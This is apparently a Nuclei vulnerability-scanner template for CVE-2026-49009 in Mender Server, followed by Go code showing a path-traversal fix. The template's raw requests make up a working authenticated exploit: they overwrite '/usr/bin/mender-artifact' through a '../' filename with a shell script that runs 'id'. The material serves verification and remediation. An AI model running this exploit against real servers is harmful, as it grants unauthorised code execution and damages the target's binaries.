id: CVE-2026-49009

info:
  name: Mender Server - Authenticated Path Traversal to RCE
  author: j0xh-sec, inteleon404
  severity: critical
  description: |
    Mender Server versions 4.1.0, 4.0.1, and below are vulnerable to an authenticated path traversal in the single-file artifact generation API endpoint. An attacker with a valid user account can supply a filename containing `../` traversal sequences (e.g. `../../../../usr/bin/mender-artifact`), causing the uploaded file payload to be written outside the intended directory. When the create-artifact-worker workflow later invokes the overwritten binary, the attacker's injected command is executed within the worker container, achieving remote code execution. The flaw was fixed in Mender Server 4.1.1 (stable) and 4.0.2 (LTS) by hardening input validation in the single-file generation handler.
  impact: |
    Successful exploitation gives an authenticated attacker remote code execution inside the create-artifact-worker container. In multi-tenant Hosted Mender environments this can compromise artifacts belonging to other organizations sharing the same infrastructure.
  remediation: |
    Upgrade to Mender Server 4.1.1, 4.0.2, or later. Affected versions include all releases prior to and including 4.1.0 and 4.0.1 for both Mender Server Community (Open Source) and Mender Server Enterprise.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-49009
    - https://mender.io/blog/cve-2026-49009-cve-2026-33552-input-sanitization-and-access-control-issues-in-mender-server
    - https://app.opencve.io/cve/CVE-2026-49009
    - https://www.tenable.com/cve/CVE-2026-49009
    - https://docs.mender.io/release-information/release-notes-changelog/mender-server
    - https://docs.mender.io/release-information/release-notes-changelog/mender-server-enterprise
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2026-49009
    cwe-id: CWE-22
    epss-score: 0.00180
    epss-percentile: 0.59645
    cpe: cpe:2.3:a:northern.tech:mender_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: northern.tech
    product: mender_server
    shodan-query: http.title:"Mender"
    fofa-query: app="Mender"
  tags: cve,cve2026,mender,path-traversal,rce,authenticated,intrusive

http:
  - raw:
      - |+
        POST /api/management/v1/useradm/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Basic {{base64('{{username}}:{{password}}')}}

        {}

      - |+
        POST /api/management/v1/deployments/artifacts/generate HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{jwt}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="name"

        cve-poc-{{randhex_6}}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="description"

        CVE-2026-49009 verification
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="type"

        single-file
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="device_types_compatible"

        qemu
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="args"
        Content-Type: application/json

        {"filename":"../../../../usr/bin/mender-artifact","dest_dir":"/opt/mender/app","software_name":"demo","software_version":"1"}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="file"; filename="payload.sh"
        Content-Type: application/octet-stream

        #!/bin/sh
        /usr/bin/id>/tmp/.cve-2026-49009
        ------WebKitFormBoundary{{randstr}}--

    extractors:
      - type: regex
        name: jwt
        part: body
        internal: true
        regex:
          - "([A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+)"

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'len(jwt) > 100'
          - 'status_code_2 >= 200 && status_code_2 < 300'
          - 'contains(to_string(header_2_all), "Location")'
        condition: and
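The fix noted in the description hardened validation of the user-supplied filename in the single-file handler. The following Go example is added here and is not Mender's code; the working directory and the function names are assumptions. It shows why a plain filepath.Join lets a `../` name resolve outside the working directory, and how a confining check rejects such names before anything is written.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrTraversal is returned for any name that would escape the base directory.
var ErrTraversal = errors.New("filename escapes the artifact working directory")

// unsafeJoin mirrors the weak CWE-22 pattern: the user-supplied name is joined
// onto the working directory and used as-is. filepath.Join collapses "../"
// segments, so the result silently leaves base.
func unsafeJoin(base, name string) string {
	return filepath.Join(base, name)
}

// safeJoin confines name to a single path component inside base: it rejects
// empty or dot names, absolute paths and any separator, then re-checks with
// filepath.Rel that the cleaned result still sits under base.
func safeJoin(base, name string) (string, error) {
	if name == "" || name == "." || name == ".." {
		return "", ErrTraversal
	}
	if filepath.IsAbs(name) || strings.ContainsAny(name, `/\`) {
		return "", ErrTraversal
	}
	full := filepath.Join(base, name)
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrTraversal
	}
	return full, nil
}

func main() {
	const base = "/tmp/artifact-work" // assumed working directory, not Mender's real path
	for _, name := range []string{"rootfs.img", "../../../../usr/bin/mender-artifact"} {
		fmt.Printf("unsafe: %s\n", unsafeJoin(base, name))
		if p, err := safeJoin(base, name); err != nil {
			fmt.Printf("safe:   rejected %q: %v\n", name, err)
		} else {
			fmt.Printf("safe:   %s\n", p)
		}
	}
}
```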